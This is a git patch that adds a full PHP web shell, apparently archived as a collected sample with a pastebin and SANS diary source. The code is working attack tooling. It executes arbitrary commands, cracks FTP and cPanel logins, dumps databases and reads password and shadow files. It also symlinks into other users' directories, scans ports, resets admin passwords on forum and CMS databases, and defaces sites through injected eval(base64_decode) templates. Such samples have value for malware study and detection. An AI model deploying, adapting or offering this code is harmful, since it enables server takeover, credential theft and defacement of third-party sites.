From d00091ccdf7a68550a27497128239920b979a8f7 Mon Sep 17 00:00:00 2001
From: tennc
Date: Thu, 14 Sep 2017 15:22:33 +0800
Subject: [PATCH] Create v4xGus6X.php from : http://pastebin.com/raw/v4xGus6X https://isc.sans.edu/diary/22826
---
 php/twitter/v4xGus6X.php | 6240 ++++++++++++++++++++++++++++++++++++++
 1 file changed, 6240 insertions(+)
 create mode 100644 php/twitter/v4xGus6X.php
diff --git a/php/twitter/v4xGus6X.php b/php/twitter/v4xGus6X.php
new file mode 100644
index 0000000..5f9c3b4
--- /dev/null
+++ b/php/twitter/v4xGus6X.php
@@ -0,0 +1,6240 @@ + $k) { + $row[$j] = "'".mysql_escape_string($k)."'"; + } + write("INSERT INTO $i VALUES(".implode(",", $row).");"); + } + } + } + + fclose ($fp); + + header("Content-Disposition: attachment; filename=" . $file); + header("Content-Type: application/download"); + header("Content-Length: " . filesize($file)); + flush(); + + $fp = fopen($file, "r"); + while (!feof($fp)) + { + echo fread($fp, 65536); + flush(); + } + fclose($fp); + } +} +function shellstyle() +{ + echo ""; +} +if(isset($_COOKIE['hacked']) && $_COOKIE['hacked']==md5($pass)) +{ + $self=$_SERVER["PHP_SELF"]; + $os = "N/D"; + $bdmessage = null; + $dir = getcwd(); + + if(stristr(php_uname(),"Windows")) + { + $SEPARATOR = '\\'; + $os = "Windows"; + $directorysperator="\\"; + } + else if(stristr(php_uname(),"Linux")) + { + $os = "Linux"; + $directorysperator='/'; + } + function Trail($d,$directsperator) + { + $d=explode($directsperator,$d); + array_pop($d); + array_pop($d); + $str=implode($d,$directsperator); + return $str; + } + + function ftp_check($host,$user,$pass,$timeout) + { + $ch = curl_init(); + curl_setopt($ch, CURLOPT_URL, "ftp://$host"); + curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); + curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC); + curl_setopt($ch, CURLOPT_FTPLISTONLY, 1); + curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass"); + curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout); + curl_setopt($ch, CURLOPT_FAILONERROR, 1); + $data = curl_exec($ch); + if ( curl_errno($ch) == 28 ) + { + print "
+ Error : Connection Timeout. + Please Check The Target Hostname .
";exit; + } + else if ( curl_errno($ch) == 0 ) + { + print "
[~] + Cracking Success With Username "$user\" + and Password \"$pass\"


"; + } + curl_close($ch); + } + + function cpanel_check($host,$user,$pass,$timeout) + { + global $cpanel_port; + $ch = curl_init(); + curl_setopt($ch, CURLOPT_URL, "http://$host:" . $cpanel_port); + curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); + curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC); + curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass"); + curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout); + curl_setopt($ch, CURLOPT_FAILONERROR, 1); + $data = curl_exec($ch); + if ( curl_errno($ch) == 28 ) + { print "
Error : Connection Timeout. + Please Check The Target Hostname.
";exit;} + else if ( curl_errno($ch) == 0 ){ + print "[~] + + Cracking Success With Username "$user\" + and Password \"$pass\"

"; + } + curl_close($ch); + } + + // Database functions + function listdatabase() + { + $self=$_SERVER["PHP_SELF"]; + ?> +
+
+ + + + + +
+
+
+ \n"; + + $pDB = mysql_list_dbs( $mysqlHandle ); + $num = mysql_num_rows( $pDB ); + for( $i = 0; $i < $num; $i++ ) + { + $dbname = mysql_dbname( $pDB, $i ); + mysql_select_db($dbname,$mysqlHandle); + $result = mysql_query("SHOW TABLES"); + $num_of_tables = mysql_num_rows($result); + echo "\n"; + echo "$dbname ($num_of_tables)\n"; + echo "Tables\n"; + echo "Drop\n"; + echo "Dump\n"; + echo "\n"; + } + echo "\n"; + mysql_close($mysqlHandle); + } + + function listtable() + { + $self=$_SERVER["PHP_SELF"]; + $dbserver = $_COOKIE["dbserver"]; + $dbuser = $_COOKIE["dbuser"]; + $dbpass = $_COOKIE["dbpass"]; + $dbname = $_GET['dbname']; + echo "
[ $dbname ] - > Database List   [ Log Out ]
"; + ?> +

+
+ + + + + + +
+ +
+ + + + + + + + +
+
+ + Error : $msg

\n"; + return; + } + $num = mysql_num_rows( $pTable ); + + echo "\n"; + + for( $i = 0; $i < $num; $i++ ) + { + $tablename = mysql_tablename( $pTable, $i ); + $result = mysql_query("select * from $tablename"); + $num_rows = mysql_num_rows($result); + echo "\n"; + echo "\n"; + echo "\n"; + echo "\n"; + echo "\n"; + echo "\n"; + echo "\n"; + } + + echo "
\n"; + echo "$tablename ($num_rows)\n"; + echo "\n"; + echo "Schema\n"; + echo "\n"; + echo "Data\n"; + echo "\n"; + echo "Empty\n"; + echo "\n"; + echo "Drop\n"; + echo "
"; + mysql_close($mysqlHandle); + echo "

[ $dbname ] - > Database List   [ Log Out ]
"; + } + + + function paramexe($n, $v) + { + $v = trim($v); + if($v) + { + echo '' . $n . ': '; + if(strpos($v, "\n") === false) + echo '' . $v . '
'; + else + echo '
' . $v . '
'; + } + } + + + + function rrmdir($dir) + { + if (is_dir($dir)) // ensures that we actually have a directory + { + $objects = scandir($dir); // gets all files and folders inside + foreach ($objects as $object) + { + if ($object != '.' && $object != '..') + { + if (is_dir($dir . '/' . $object)) + { + // if we find a directory, do a recursive call + rrmdir($dir . '/' . $object); + } + else + { + // if we find a file, simply delete it + unlink($dir . '/' . $object); + } + } + } + // the original directory is now empty, so delete it + rmdir($dir); + } + } + + function which($pr) + { + $path = execmd("which $pr"); + if(!empty($path)) + return trim($path); + else + return trim($pr); + } + + function magicboom($text) + { + if (!get_magic_quotes_gpc()) + return $text; + return stripslashes($text); + } + +function execmd($cmd,$d_functions="None") +{ + if($d_functions=="None") + { + $ret=passthru($cmd); + return $ret; + } + $funcs=array("shell_exec","exec","passthru","system","popen","proc_open"); + $d_functions=str_replace(" ","",$d_functions); + $dis_funcs=explode(",",$d_functions); + foreach($funcs as $safe) + { + if(!in_array($safe,$dis_funcs)) + { + if($safe=="exec") + { + $ret=@exec($cmd); + $ret=join("\n",$ret); + return $ret; + } + elseif($safe=="system") + { + $ret=@system($cmd); + return $ret; + } + elseif($safe=="passthru") + { + $ret=@passthru($cmd); + return $ret; + } + elseif($safe=="shell_exec") + { + $ret=@shell_exec($cmd); + return $ret; + } + elseif($safe=="popen") + { + $ret=@popen("$cmd",'r'); + if(is_resource($ret)) + { + while(@!feof($ret)) + $read.=@fgets($ret); + @pclose($ret); + return $read; + } + return -1; + } + elseif($safe="proc_open") + { + $cmdpipe=array( + 0=>array('pipe','r'), + 1=>array('pipe','w') + ); + $resource=@proc_open($cmd,$cmdpipe,$pipes); + if(@is_resource($resource)) + { + while(@!feof($pipes[1])) + $ret.=@fgets($pipes[1]); + @fclose($pipes[1]); + @proc_close($resource); + return $ret; + } + return -1; + } + } + } + return -1; 
+} + + function getDisabledFunctions() + { + if(!ini_get('disable_functions')) + { + return "None"; + } + else + { + return @ini_get('disable_functions'); + } + } + + function getFilePermissions($file) + { + $perms = fileperms($file); + + if (($perms & 0xC000) == 0xC000) { + // Socket + $info = 's'; + } elseif (($perms & 0xA000) == 0xA000) { + // Symbolic Link + $info = 'l'; + } elseif (($perms & 0x8000) == 0x8000) { + // Regular + $info = '-'; + } elseif (($perms & 0x6000) == 0x6000) { + // Block special + $info = 'b'; + } elseif (($perms & 0x4000) == 0x4000) { + // Directory + $info = 'd'; + } elseif (($perms & 0x2000) == 0x2000) { + // Character special + $info = 'c'; + } elseif (($perms & 0x1000) == 0x1000) { + // FIFO pipe + $info = 'p'; + } else { + // Unknown + $info = 'u'; + } + + // Owner + $info .= (($perms & 0x0100) ? 'r' : '-'); + $info .= (($perms & 0x0080) ? 'w' : '-'); + $info .= (($perms & 0x0040) ? + (($perms & 0x0800) ? 's' : 'x' ) : + (($perms & 0x0800) ? 'S' : '-')); + + // Group + $info .= (($perms & 0x0020) ? 'r' : '-'); + $info .= (($perms & 0x0010) ? 'w' : '-'); + $info .= (($perms & 0x0008) ? + (($perms & 0x0400) ? 's' : 'x' ) : + (($perms & 0x0400) ? 'S' : '-')); + + // World + $info .= (($perms & 0x0004) ? 'r' : '-'); + $info .= (($perms & 0x0002) ? 'w' : '-'); + $info .= (($perms & 0x0001) ? + (($perms & 0x0200) ? 't' : 'x' ) : + (($perms & 0x0200) ? 
'T' : '-')); + + return $info; +} + function filepermscolor($filename) + { + if(!@is_readable($filename)) + return "".getFilePermissions($filename).""; + else if(!@is_writable($filename)) + return "".getFilePermissions($filename).""; + else + return "".getFilePermissions($filename).""; + } + + function yourip() + { + echo $_SERVER["REMOTE_ADDR"]; + } + function phpver() + { + $pv=@phpversion(); + echo $pv; + } + function magic_quote() + { + echo get_magic_quotes_gpc()?"ON":"OFF"; + } + function serverip() + { + echo getenv('SERVER_ADDR'); + } + function serverport() + { + echo $_SERVER['SERVER_PORT']; + } + function safe() + { + global $sm; + return $sm?"ON :( :'( (Most of the Features will Not Work!)":"OFF"; + } + function serveradmin() + { + echo $_SERVER['SERVER_ADMIN']; + } + function systeminfo() + { + echo php_uname(); + } + function curlinfo() + { + echo function_exists('curl_version')?("Enabled"):("Disabled"); + } + function oracleinfo() + { + echo function_exists('ocilogon')?("Enabled"):("Disabled"); + } + function mysqlinfo() + { + echo function_exists('mysql_connect')?("Enabled"):("Disabled"); + } + function mssqlinfo() + { + echo function_exists('mssql_connect')?("Enabled"):("Disabled"); + } + function postgresqlinfo() + { + echo function_exists('pg_connect')?("Enabled"):("Disabled"); + } + function softwareinfo() + { + echo getenv("SERVER_SOFTWARE"); + } + function download() + { + $frd=$_GET['download']; + $prd=explode("/",$frd); + for($i=0;$i $mod; $i++) + { + $size /= $mod; + } + return round($size, 2) . ' ' . $units[$i]; + } + + function showDrives() + { + global $self; + foreach(range('A','Z') as $drive) + { + if(is_dir($drive.':\\')) + { + $myd = $drive.":\\"; + ?> + + + + ' . $n . ': '; + if(strpos($v, "\n") === false) + echo '' . $v . '
'; + else + echo '
' . $v . '
'; + } + } + + myparam('Server software', @getenv('SERVER_SOFTWARE')); + if(function_exists('apache_get_modules')) + myparam('Loaded Apache modules', implode(', ', apache_get_modules())); + myparam('Open base dir', @ini_get('open_basedir')); + myparam('Safe mode exec dir', @ini_get('safe_mode_exec_dir')); + myparam('Safe mode include dir', @ini_get('safe_mode_include_dir')); + $temp=array(); + if(function_exists('mysql_get_client_info')) + $temp[] = "MySql (".mysql_get_client_info().")"; + if(function_exists('mssql_connect')) + $temp[] = "MSSQL"; + if(function_exists('pg_connect')) + $temp[] = "PostgreSQL"; + if(function_exists('oci_connect')) + $temp[] = "Oracle"; + myparam('Supported databases', implode(', ', $temp)); + echo '
'; + + if($GLOBALS['os'] == 'Linux') { + myparam('Distro : ', myexe("cat /etc/*-release")); + myparam('Readable /etc/passwd', @is_readable('/etc/passwd')?"yes [view]":'no'); + myparam('Readable /etc/shadow', @is_readable('/etc/shadow')?"yes [view]":'no'); + myparam('OS version', @file_get_contents('/proc/version')); + myparam('Distr name', @file_get_contents('/etc/issue.net')); + myparam('Where is Perl?', myexe('whereis perl')); + myparam('Where is Python?', myexe('whereis python')); + myparam('Where is gcc?', myexe('whereis gcc')); + myparam('Where is apache?', myexe('whereis apache')); + myparam('CPU?', myexe('cat /proc/cpuinfo')); + myparam('RAM', myexe('free -m')); + myparam('Mount options', myexe('cat /etc/fstab')); + myparam('User Limits', myexe('ulimit -a')); + + + if(!$GLOBALS['safe_mode']) { + $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl'); + $danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja'); + $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror'); + echo '
'; + $temp=array(); + foreach ($userful as $item) + if(thiscmd($item)) + $temp[] = $item; + myparam('Userful', implode(', ',$temp)); + $temp=array(); + foreach ($danger as $item) + if(thiscmd($item)) + $temp[] = $item; + myparam('Danger', implode(', ',$temp)); + $temp=array(); + foreach ($downloaders as $item) + if(thiscmd($item)) + $temp[] = $item; + myparam('Downloaders', implode(', ',$temp)); + echo '
'; + myparam('HDD space', myexe('df -h')); + myparam('Hosts', @file_get_contents('/etc/hosts')); + + } + } else { + $repairsam = addslashes($_SERVER["WINDIR"]."\\repair\\sam"); + $hostpath = addslashes($_SERVER["WINDIR"]."\system32\drivers\etc\hosts"); + $netpath = addslashes($_SERVER["WINDIR"]."\system32\drivers\etc\\networks"); + $sampath = addslashes($_SERVER["WINDIR"]."\system32\drivers\etc\lmhosts.sam"); + echo "Password File : Download password file
"; + echo "Config Files : [ Hosts ]  [ Local Network Map ]  [ lmhosts ]
"; + $base = (ini_get("open_basedir") or strtoupper(ini_get("open_basedir"))=="ON")?"ON":"OFF"; + echo "Open Base Dir : " . $base . "
"; + myparam('OS Version',myexe('ver')); + myparam('Account Settings',myexe('net accounts')); + myparam('User Accounts',myexe('net user')); + } + echo ''; + } + + + + function myexe($in) + { + $out = ''; + if (function_exists('exec')) { + @exec($in,$out); + $out = @join("\n",$out); + } elseif (function_exists('passthru')) { + ob_start(); + @passthru($in); + $out = ob_get_clean(); + } elseif (function_exists('system')) { + ob_start(); + @system($in); + $out = ob_get_clean(); + } elseif (function_exists('shell_exec')) { + $out = shell_exec($in); + } elseif (is_resource($f = @popen($in,"r"))) { + $out = ""; + while(!@feof($f)) + $out .= fread($f,1024); + pclose($f); + } + return $out; +} + + function exec_all($command) + { + + $output = ''; + if(function_exists('exec')) + { + exec($command,$output); + $output = join("\n",$output); + } + + else if(function_exists('shell_exec')) + { + $output = shell_exec($command); + } + + else if(function_exists('popen')) + { + $handle = popen($command , "r"); // Open the command pipe for reading + if(is_resource($handle)) + { + if(function_exists('fread') && function_exists('feof')) + { + while(!feof($handle)) + { + $output .= fread($handle, 512); + } + } + else if(function_exists('fgets') && function_exists('feof')) + { + while(!feof($handle)) + { + $output .= fgets($handle,512); + } + + + + } + } + pclose($handle); + } + + + else if(function_exists('system')) + { + ob_start(); //start output buffering + system($command); + $output = ob_get_contents(); // Get the ouput + ob_end_clean(); // Stop output buffering + } + + else if(function_exists('passthru')) + { + ob_start(); //start output buffering + passthru($command); + $output = ob_get_contents(); // Get the ouput + ob_end_clean(); // Stop output buffering + } + + else if(function_exists('proc_open')) + { + $descriptorspec = array( + 1 => array("pipe", "w"), // stdout is a pipe that the child will write to + ); + $handle = proc_open($command ,$descriptorspec , $pipes); // This 
will return the output to an array 'pipes' + if(is_resource($handle)) + { + if(function_exists('fread') && function_exists('feof')) + { + while(!feof($pipes[1])) + { + $output .= fread($pipes[1], 512); + } + } + else if(function_exists('fgets') && function_exists('feof')) + { + while(!feof($pipes[1])) + { + $output .= fgets($pipes[1],512); + } + } + } + pclose($handle); + } + + return(htmlspecialchars($output)); + +} + +$basedir=(ini_get("open_basedir") or strtoupper(ini_get("open_basedir"))=="ON")?"ON":"OFF"; +$etc_passwd=@is_readable("/etc/passwd")?"Yes":"No"; + +function getOGid($value) +{ + if(!function_exists('posix_getegid')) { + $user = @get_current_user(); + $uid = @getmyuid(); + $gid = @getmygid(); + $group = "?"; + $owner = $uid . "/". $gid; + return $owner; + } else { + $name=@posix_getpwuid(@fileowner($value)); + $group=@posix_getgrgid(@filegroup($value)); + $owner = $name['name']. " / ". $group['name']; + return $owner; + } +} + +function mainfun($dir) +{ + global $ind, $directorysperator,$os; + + $mydir = basename(dirname(__FILE__)); + $pdir = str_replace($mydir,"",$dir); + $pdir = str_replace("/","",$dir); + + $files = array(); + $dirs = array(); + + $odir=opendir($dir); + while($file = readdir($odir)) + { + if(is_dir($dir.'/'.$file)) + { + $dirs[]=$file; + } + else + { + $files[]=$file; + } + } + $countfiles = count($dirs) + count($files); + $dircount = count($dirs); + $dircount = $dircount-2; + $myfiles = array_merge($dirs,$files); + $i = 0; + if(is_dir($dir)) + { + if(scandir($dir) === false) + echo "
Directory isn't readable
"; + else + { +?>
+ + + + + + + + Owner / Group"; } ?> + + + + + + + + + "; + echo getOGid($dir).""; + } + ?> + + + + + + "; + echo getOGid($val).""; + + } ?> + + + + + + + + "; + echo getOGid($val).""; + } ?> + + + + + + + + + + + + + + "; + echo getOGid($val).""; + } ?> + + + + + +

+ +


  + + +
"; + }} + else + { + echo "

".$_GET['dir']." is NOT a Valid Directory!

"; + } + +} +if(isset($_REQUEST["script"])) +{ + $getpath = trim(dirname($_SERVER['SCRIPT_NAME']) . PHP_EOL); + ?> +
Listing folder ()
NameSizePermissionsModification DateRenameDownloadAction
[ . ]CURDIR
[ .. ]UPDIR
[ ]DIRRename
". $val . ""; } else { echo $val; } ?> ( Deface IT )"; } } ?>RenameDownload +
+ +
| Do It Manually || Do It Automatically |
+ +
+
+
+ +
+
+ 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named") + continue; + syml($matches,$matches); + } + fclose($file); + unlink("test.txt"); + echo "
[ Done ]
"; + echo "
| Go Here |
"; + + } + else + { + $d0mains = @file("/etc/named.conf"); + if($d0mains) + { + mkdir("dhanushST"); + chdir("dhanushST"); + + foreach($d0mains as $d0main) + { + if(eregi("zone",$d0main)) + { + preg_match_all('#zone "(.*)"#', $d0main, $domains); + flush(); + + if(strlen(trim($domains[1][0])) > 2) + { + $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0])); + + syml($user['name'],$domains[1][0]); + } + } + } + echo "
[ Done ]
"; + echo "
| Go Here |
"; + } + else + { + mkdir("dhanushSPT"); + chdir("dhanushSPT"); + $temp = ""; + $val1 = 0; + $val2 = 1000; + for(;$val1 <= $val2;$val1++) + { + $uid = @posix_getpwuid($val1); + if ($uid) + $temp .= join(':',$uid)."\n"; + } + echo '
'; + $temp = trim($temp); + + $file5 = fopen("test.txt","w"); + fputs($file5,$temp); + fclose($file5); + + + $file = fopen("test.txt", "r") or exit("Unable to open file!"); + while(!feof($file)) + { + $s = fgets($file); + $matches = array(); + $t = preg_match('/\/(.*?)\:\//s', $s, $matches); + $matches = str_replace("home/","",$matches[1]); + if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named") + continue; + syml($matches,$matches); + } + fclose($file); + echo ""; + unlink("test.txt"); + echo "
[ Done ]
"; + echo "
| Go Here |
"; + } + } + } + else + echo "
Cannot Complete the task!!!!
"; + +} +else if(isset($_GET["symlinkfile"])) +{ + if(!isset($_GET['file'])) + { + ?> +
+
+ + +
+

+ check symlink symlink'.$num.' file'; + } + else + echo '
Cannot Create Symlink
'; +} +else if(isset($_REQUEST['404new'])) +{ + ?> +
+

+
+
+
+ Done setting 404 Page !!!!"; + } + else + echo "
Cannot Set 404 Page
"; + } + else if(strlen($ind) != 0) + { + if($myfile = fopen(".htaccess", "a")) + { + fwrite($myfile, "ErrorDocument 404 ".$url."404.html \n\r"); + + if($myfilee = fopen("404.html", "w+")) + { + fwrite($myfilee, base64_decode($ind)); + + fclose($myfilee); + echo "
Done setting 404 Page !!!!
"; + } + fclose($myfile); + } + else + { + echo "
Cannot Set 404 Page
"; + } + } + else + echo "
Nothing Specified in the shell
"; +} +else if(isset($_GET["domains"])) +{ + ?>
S. No.DomainsUsersSymlinkInformation"; + + $dcount = 1; + foreach($d0mains as $d0main) + { + if(eregi("zone",$d0main)) + { + preg_match_all('#zone "(.*)"#', $d0main, $domains); + flush(); + + if(strlen(trim($domains[1][0])) > 2) + { + $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0])); + + echo "" . $dcount . "".$domains[1][0]."".$user['name']."Symlinkinfo"; flush(); + $dcount++; + } + } + + } + echo ""; + } + else + { + if(stristr(php_uname(),"Linux")) + { + ?> +
+
+ + + + + + + + + + + + + + +
Get User Name
Enter Website Name :
+
+
+ S. No.UsersSymlink"; + + $dcount = 1; + $file = fopen("/etc/passwd", "r"); + //Output a line of the file until the end is reached + while(!feof($file)) + { + $s = fgets($file); + $matches = array(); + $t = preg_match('/\/(.*?)\:\//s', $s, $matches); + $matches = str_replace("home/","",$matches[1]); + if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named") + continue; + echo "" . $dcount . "" . $matches . ""; + echo "Symlink"; + $dcount++; + } + fclose($file); + + echo ""; + } + else + { + @mkdir("dhanush",0777); + @chdir("dhanush"); + execmd("ln -s / root"); + $file3 = 'Options all + DirectoryIndex Sux.html + AddType text/plain .php + AddHandler server-parsed .php + AddType text/plain .html + AddHandler txt .html + Require None + Satisfy Any + '; + $fp3 = fopen('.htaccess','w'); + $fw3 = fwrite($fp3,$file3); + @fclose($fp3); + + echo ""; + + $temp = ""; + $val1 = 0; + $val2 = 1000; + for(;$val1 <= $val2;$val1++) + { + $uid = @posix_getpwuid($val1); + if ($uid) + $temp .= join(':',$uid)."\n"; + } + echo '
'; + $temp = trim($temp); + + $file5 = fopen("test.txt","w"); + fputs($file5,$temp); + fclose($file5); + + $dcount = 1; + $file = fopen("test.txt", "r"); + while(!feof($file)) + { + $s = fgets($file); + $matches = array(); + $t = preg_match('/\/(.*?)\:\//s', $s, $matches); + $matches = str_replace("home/","",$matches[1]); + if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named") + continue; + echo ""; + echo ""; + $dcount++; + } + fclose($file); + echo "
S. No.UsersSymlink
" . $dcount . "" . $matches . "Symlink
"; + unlink("test.txt"); + } + } + else + echo "
Cannot create Symlink
"; + } +} +else if(isset($_GET['host']) && isset($_GET['protocol'])) +{ + echo "Open Ports: "; + $host = $_GET['host']; + $proto = $_GET['protocol']; + $myports = array("21","22","23","25","59","80","113","135","445","1025","5000","5900","6660","6661","6662","6663","6665","6666","6667","6668","6669","7000","8080","8018"); + for($current = 0; $current <= 23; $current++) + { + $currents = $myports[$current]; + $service = getservbyport($currents, $proto); + // Try to connect to port + $result = fsockopen($host, $currents, $errno, $errstr, 1); + // Show results + if($result) + echo "$currents, "; + } +} +else if(isset($_REQUEST['forumpass'])) +{ + $localhost = $_GET['f1']; + $database = $_GET['f2']; + $username = $_GET['f3']; + $password = $_GET['f4']; + $prefix = $_GET['prefix']; + $newpass = $_GET['newpass']; + $uid = $_GET['uid']; + + if($_GET['forums'] == "vb") + { + $newpass = $_GET['newipbpass']; + $uid = $_GET['ipbuid']; + $con = mysql_connect($localhost,$username,$password); + $db = mysql_select_db($database,$con); + $salt = "eghjghrtd"; + $newpassword = md5(md5($newpass) . 
$salt); + if($prefix == "" || $prefix == null) + $sql = mysql_query("update user set password = '$newpassword', salt = '$salt' where userid = '$uid'"); + else + $sql = mysql_query("update ".$prefix."user set password = '$newpassword', salt = '$salt' where userid = '$uid'"); + if($sql) + { + mysql_close($con); + echo "Password Changed Successfully"; + } + else + echo "Cannot Change Password"; + } + else if($_GET['forums'] == "mybb") + { + $newpass = $_GET['newipbpass']; + $uid = $_GET['ipbuid']; + $con = mysql_connect($localhost,$username,$password); + $db = mysql_select_db($database,$con); + $salt = "jeghj"; + $newpassword = md5(md5($salt).md5($newpass)); + if($prefix == "" || $prefix == null) + $sql = mysql_query("update mybb_users set password = '$newpassword', salt = '$salt' where uid = '$uid'"); + else + $sql = mysql_query("update ".$prefix."users set password = '$newpassword', salt = '$salt' where uid = '$uid'"); + if($sql) + { + mysql_close($con); + echo "Password Changed Successfully"; + } + else + echo "Cannot Change Password"; + } + else if($_GET['forums'] == "smf") + { + $newpass = $_GET['newipbpass']; + $uid = $_GET['ipbuid']; + $con = mysql_connect($localhost,$username,$password); + $db = mysql_select_db($database,$con); + + if($prefix == "" || $prefix == null) + { + $result = mysql_query("select member_name from smf_members where id_member = $uid"); + $row = mysql_fetch_array($result); + $membername = $row['member_name']; + $newpassword = sha1(strtolower($membername).$newpass); + $sql = mysql_query("update smf_members set passwd = '$newpassword' where id_member = '$uid'"); + } + else + + { + $result = mysql_query("select member_name from ".$prefix."members where id_member = $uid"); + $row = mysql_fetch_array($result); + $membername = $row['member_name']; + $newpassword = sha1(strtolower($membername).$newpass); + $sql = mysql_query("update ".$prefix."members set passwd = '$newpassword' where id_member = '$uid'"); + } + if($sql) + { + mysql_close($con); 
+ echo "Password Changed Successfully"; + } + else + echo "Cannot Change Password"; + } + else if($_GET['forums'] == "phpbb") + { + $newpass = $_POST['newipbpass']; + $uid = $_POST['ipbuid']; + $con = mysql_connect($localhost,$username,$password); + $db = mysql_select_db($database,$con); + + $newpassword = md5($newpass); + if(empty($prefix) || $prefix == null) + $sql = mysql_query("update phpb_users set user_password = '$newpassword' where user_id = '$uid'"); + else + $sql = mysql_query("update ".$prefix."users set user_password = '$newpassword' where user_id = '$uid'"); + if($sql) + { + mysql_close($con); + echo "Password Changed Successfully"; + } + else + echo "Cannot Change Password"; + } + else if($_GET['forums'] == "ipb") + { + $newpass = $_POST['newipbpass']; + $uid = $_POST['ipbuid']; + $con = mysql_connect($localhost,$username,$password); + $db = mysql_select_db($database,$con); + $salt = "eghj"; + $newpassword = md5(md5($salt).md5($newpass)); + if($prefix == "" || $prefix == null) + $sql = mysql_query("update members set members_pass_hash = '$newpassword', members_pass_salt = '$salt' where member_id = '$uid'"); + else + $sql = mysql_query("update ".$prefix."members set members_pass_hash = '$newpassword', members_pass_salt = '$salt' where member_id = '$uid'"); + if($sql) + { + mysql_close($con); + echo "Password Changed Successfully"; + } + else + echo "Cannot Change Password"; + } + else if($_GET['forums'] == "wp") + { + $uname = $_GET['uname']; + $con = mysql_connect($localhost,$username,$password); + $db = mysql_select_db($database,$con); + + $newpassword = md5($newpass); + if($prefix == "" || $prefix == null) + $sql = mysql_query("update wp_users set user_pass = '$newpassword', user_login = '$uname' where ID = '$uid'"); + else + $sql = mysql_query("update ".$prefix."users set user_pass = '$newpassword', user_login = '$uname' where ID = '$uid'"); + if($sql) + { + mysql_close($con); + echo "Password Changed Successfully"; + } + else + echo "Cannot Change 
Password"; + } + else if($_GET['forums'] == "joomla") + { + $newjoomlapass = $_GET['newjoomlapass']; + $joomlauname = $_GET['username']; + $con = mysql_connect($localhost,$username,$password); + $db = mysql_select_db($database,$con); + + $newpassword = md5($newjoomlapass); + if($prefix == "" || $prefix == null) + $sql = mysql_query("update jos_users set password = '$newpassword', username = '$joomlauname' where name = 'Super User'"); + else + $sql = mysql_query("update ".$prefix."users set password = '$newpassword', username = '$joomlauname' where name = 'Super User' OR name = 'Administrator'"); + if($sql) + { + mysql_close($con); + echo "Password Changed Successfully"; + } + else + echo "Cannot Change Password"; + } +} +else if(isset($_POST['forumdeface'])) +{ + $localhost = $_POST['f1']; + $database = $_POST['f2']; + $username = $_POST['f3']; + $password = $_POST['f4']; + $index = $_POST['index']; + $prefix = $_POST['tableprefix']; + + if($_POST['forumdeface'] == "vb") + { + $con =@ mysql_connect($localhost,$username,$password); + $db =@ mysql_select_db($database,$con); + $index=str_replace('"','\\"',$index); + $attack = "{\${eval(base64_decode(\'"; + $attack .= base64_encode("echo \"$index\";"); + $attack .= "\'))}}{\${exit()}}"; + if($prefix == "" || $prefix == null) + $query = "UPDATE template SET template = '$attack'"; + else + $query = "UPDATE ".$prefix."template SET template = '$attack'"; + $result =@ mysql_query($query,$con); + if($result) + echo "
Vbulletin Forum Defaced Successfully
"; + else + echo "
Cannot Deface Vbulletin Forum
"; + } + else if($_POST['forumdeface'] == "mybb") + { + $con =@ mysql_connect($localhost,$username,$password); + $db =@ mysql_select_db($database,$con); + $attack = "{\${eval(base64_decode(\'"; + $attack .= base64_encode("echo \"$index\";"); + $attack .= "\'))}}{\${exit()}}"; + $attack = str_replace('"',"\\'",$attack); + + if($prefix == "" || $prefix == null) + $query = "UPDATE mybb_templates SET template = '$attack'"; + else + $query = "UPDATE ".$prefix."templates SET template = '$attack'"; + $result =@ mysql_query($query,$con); + if($result) + echo "
Mybb Forum Defaced Successfully
"; + else + echo "
Cannot Deface Mybb Forum
"; + } + else if($_POST['forumdeface'] == "smf") + { + $head = $_POST['head']; + $catid = $_POST['f5']; + + $con =@ mysql_connect($localhost,$username,$password); + $db =@ mysql_select_db($database,$con); + if($prefix == "" || $prefix == null) + $query = "UPDATE boards SET name='$head', description='$index' WHERE id_cat='$catid'"; + else + $query = "UPDATE ".$prefix."boards SET name='$head', description='$index' WHERE id_cat='$catid'"; + $result =@ mysql_query($query,$con); + if($result) + echo "
SMF Forum Index Changed Successfully
"; + else + echo "
Cannot Deface SMF Forum
